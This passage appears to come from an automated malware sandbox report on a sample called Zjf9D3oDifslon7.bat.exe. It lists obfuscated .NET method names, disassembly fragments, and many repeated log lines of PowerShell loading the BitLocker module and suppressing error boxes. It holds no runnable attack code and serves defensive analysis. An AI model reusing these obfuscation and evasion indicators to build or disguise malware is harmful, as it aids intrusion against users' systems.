                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004117D3 push edi; ret 5_2_004117DA
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018409AD push ecx; mov dword ptr [esp], ecx5_2_018409B6
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034709AD push ecx; mov dword ptr [esp], ecx12_2_034709B6
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B4E2E0 push edi; ret 12_2_02B4E2E7
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B56228 push ebx; iretd 12_2_02B5622D
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B52260 push esi; iretd 12_2_02B52261
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B4D258 push 3788F9D1h; ret 12_2_02B4D25F
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B52244 push cs; retf 12_2_02B52249
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B5B397 push esi; ret 12_2_02B5B398
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B5B38B push es; retf 12_2_02B5B38D
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B550B6 push A3C436E7h; ret 12_2_02B550D8
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B5407D push edx; retf 12_2_02B540A3
                Source: Zjf9D3oDifslon7.bat.exeStatic PE information: section name: .text entropy: 7.8516612529531065
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, e1UZNiBuDuWYUad08v.csHigh entropy of concatenated method names: 'rbKNpOR495', 't0jN5hUPGU', 'DfQNkWERTh', 'M45NXPmGBn', 'lhZNFrfYjy', 'fvvNYwsD3E', 'Fq7NRunR4r', 'MZNNTRbGJk', 'BV6N1KCAjW', 'itdNrUWZg7'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, KJ0XgBe9sHdtVTebjt.csHigh entropy of concatenated method names: 'T8ow9oeZF8', 'okGwApjugB', 'ie1wNQnbJ4', 'EEYwIJ4BCa', 'IlmwcoPeiV', 'eRlwEtcsc3', 'JACwns304B', 'HTlwewTdiD', 'yyMwGrx5oM', 'gOxwOdysRI'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, jbvYT38HXDEdeGyqTw.csHigh entropy of concatenated method names: 'GQ9Kn1UZNi', 'IDuKeWYUad', 'eIfKOJhOYD', 'KbOKv0hgb9', 'qJ6Kx338ki', 'MDFK6oAFkA', 'HSGgXPwHqiJy5g6YCC', 'UXrtES2jBS1cOYJl30', 'MGpKK3ClcQ', 'iGlKwufPtt'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, yVTyyBRCjo44ZbKl54.csHigh entropy of concatenated method names: 'xxTgxPpAKs', 'TttglaiP0N', 'JIKggtXNYn', 'Fwgg4mr7eF', 'YqkgyoLuIV', 'lZxgJHnG6A', 'Dispose', 'Pa2VAL3kw3', 'n5pVNp9Raf', 'zStVIVxSqh'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, WsLxljpolBRdwpTQVh.csHigh entropy of concatenated method names: 'pkaxC17nun', 'fs6x77q97U', 'evCxpCuJx3', 'uiBx5hDsUU', 'p9YxDfjJqe', 'mF0xfbLjt1', 'AqExueHkZA', 'Ox8xPTTPWX', 'xhqxSPJUmP', 'DqnxmqdI07'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, m6dhIhzD6Q4jwiQXS1.csHigh entropy of concatenated method names: 'ApAbqdd01i', 'OTVbBalULy', 'HAgbQgFpk0', 'kE9bjRmDBx', 'XZtbDNULb7', 'YTibueuF6I', 'bVPbPOGdeh', 'PfFbJABrAq', 'GQkbtv1Ilf', 'KLibaKUhtt'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, t0S21Q26kddqxjRZ9H.csHigh entropy of concatenated method names: 'sIKntJaXMm', 'gwDnaDMS3f', 'qOlnimqeAq', 'v0wndVjNRG', 'UgQnW6sB1q', 'pEcnq519Pk', 'nPfnsipn4o', 'xH5nBwHueW', 'jRynQZbqZb', 'wrDnUlYRbu'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, DaR1T9QIfJhOYDSbO0.csHigh entropy of concatenated method names: 'EYOIdoAqmN', 'SPIIqxaeJS', 'csqIBOH0dl', 'Y33IQcjwPq', 'SuHIxuj5y4', 'zK8I6csuEO', 'tlpIlnf8Zu', 'UYxIVfHfkP', 'J3TIg2UIkM', 'S3qIbbFXts'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, vt8XgmK8E1qDUcdebiE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iy4LgHE6Sm', 'kvRLbDSGBo', 'qK4L4EoRYM', 'HLdLLKGBIC', 'ESJLymyMuq', 'tcGLZOvaPC', 'G3kLJNhfww'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, I3wEvoKKjatw9ZAZNyQ.csHigh entropy of concatenated method names: 'CZybrCn28n', 'GdRbzthyIC', 'aJ44MRhLHH', 'Xjv4KWPC3e', 'SkW43e7ibG', 'qu94wOVp1y', 'Xq948kAKR5', 'S8t49UbHNx', 'SjW4ARdGPp', 'i7n4NmxgSR'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, Lgb9brUKQbLPxVJ633.csHigh entropy of concatenated method names: 'guWcW9DT7t', 'kYCcsSPHcm', 'VFTIfBdhgm', 'Th4Iu9B2JE', 'ty0IPK3d10', 'gDBISSImdO', 'd3nImaTTSo', 'CxgIhjDpjA', 'XACI2sVGNa', 'bC2ICuovqP'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, hkZfWEkCMrYPvdrGAa.csHigh entropy of concatenated method names: 'ToString', 'zKN60A5YaB', 'LGS6DciPjW', 'AFo6fHLEHR', 'wIo6u2dI5t', 'n6H6P9mkWU', 'qAe6S791WT', 'TPk6mtqEVJ', 'N3n6hVxuaC', 'LKu62csl2d'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, GetZjPXiujWm3kc86a.csHigh entropy of concatenated method names: 'xFrlOeM5Hq', 'ygKlvn4CPS', 'ToString', 'gYtlA2ww84', 'QgelN9VTBO', 'bbQlI3NuO7', 'rPIlcikvBI', 'wV9lEbM0ST', 'lBplnR1oCQ', 'sshleT4vlP'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, Q4YURo3ncfXPcJGdcM.csHigh entropy of concatenated method names: 'nKCiVuNas', 'olCd5qUN4', 'cN4qT45P1', 'U5xsc6tAZ', 'Os5QdvJdN', 'l2LUXMlxr', 'tj3g8hb8UcqtFD8EUt', 'VYf6y25WwAUHi2Fl4R', 'Ny9VA81iq', 'g80bhPPnU'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, DROIOj1r5ZpuUdfaXB.csHigh entropy of concatenated method names: 'svlgjRHYj5', 'TrJgDHnleM', 'egsgfwelZS', 'gLfgurPo1a', 'dtQgPo234q', 'C9HgSKDHLR', 'k7egmEo6Sg', 'oqeghBfTMY', 'sQ3g2qQckD', 'jrmgCoeQ45'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, kxCQdeNWjFpskyXStP.csHigh entropy of concatenated method names: 'Dispose', 'P44K1ZbKl5', 'aux3DehquC', 'Rgghr6txsp', 'uJaKrfPdDJ', 'FOoKzxm5mI', 'ProcessDialogKey', 'gmB3MROIOj', 'Y5Z3KpuUdf', 'yXB33adKoQ'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, WSBqEqmIVoQfysE4GJ.csHigh entropy of concatenated method names: 'tDlnAnMsHa', 'Ff9nIoISLD', 'hxKnEvv2cv', 'bPJErrfcyV', 'zAkEzGcroe', 'xPDnMlkt4m', 'p7tnK3wV4d', 'Tarn3kd33f', 'ta9nwhw7xL', 'nGVn81X8jh'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, nV8kcOoT258qPd7c2O.csHigh entropy of concatenated method names: 'khiHBqxUNq', 'bu5HQvX11i', 'FB5Hj8LoXc', 'Q4EHDINTpu', 'PtcHuQt6Lo', 'Hb3HPrSCu3', 'spnHmG6xeR', 'gc9Hh61ntc', 'HjFHCu43vq', 'Y1cH0OCR6m'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, BpynZ3Yx1y140tbwDR.csHigh entropy of concatenated method names: 'ERclTUFPd0', 'yYKlrF8Iu5', 'HwCVMApvdS', 'mMYVKNCqII', 'eejl0SCaRh', 'kXBl7BlDdE', 'pyiloAmwee', 'Du0lp9lhO1', 'Mell5kfy60', 'b57lkQ9eMo'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, dki2DFjoAFkAwDRlsC.csHigh entropy of concatenated method names: 'tGGE91U0m9', 'a8SENlt5JY', 'YHyEc2oDu6', 'nOvEn5LRE3', 'poaEeVcQlx', 'miYcF937Fm', 'BnkcYneoYH', 'ssFcRvXTHY', 'Ny9cTwWIoQ', 'GQ4c1FQjph'
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, TZuZGwKM2mI8CeO40HW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jWib0tqtaS', 'IJBb7JAGhu', 'ppBboFKMNQ', 'EhQbpJImWX', 'sYFb5AJGyS', 'ViGbkQTkXm', 'khpbXrrGnA'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
